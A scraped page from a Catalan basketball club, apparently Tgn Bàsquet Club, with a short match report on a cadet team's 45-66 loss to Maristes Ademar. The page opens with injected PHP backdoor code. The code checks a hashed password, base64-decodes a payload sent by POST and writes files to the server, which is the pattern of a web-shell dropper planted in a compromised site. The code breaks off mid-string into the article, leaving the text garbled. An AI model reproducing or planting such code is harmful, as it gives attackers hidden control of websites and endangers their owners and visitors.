function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Cadet masculí 06A es veu superat per un intens Maristes Ademar (45-66) - Tgn Bàsquet Club -

El Cadet masculí 06A es veu superat per un intens Maristes Ademar (45-66)

Updated: juny 3, 2021

El Cadet masculí 06A no aconsegueix trobar el seu caràcter guerrer i perd contra un Maristes Ademar que hi anava a totes. El rendiment lila a l’inici del matx va estar molt per sota del que ens té acostumats, prenent males decisions ofensives i amb falta d’oxigen en la defensa. Els visitants no van afluixar la pressió a la pilota i van generar moltes pèrdues de pilotes pels locals, culminades amb bàsquets en contraatacs. Els rivals creixien amb cada recuperació i els locals s’anaven empetitint amb cada errada, arribant al descans amb un clar predomini vermell (15-35). Els liles intenten refer-se i retallar distàncies al marcador, però tot i l’anotació igualada de la segona meitat del matx, ja era massa tard, els visitants ja havien sentenciat el partit al descans.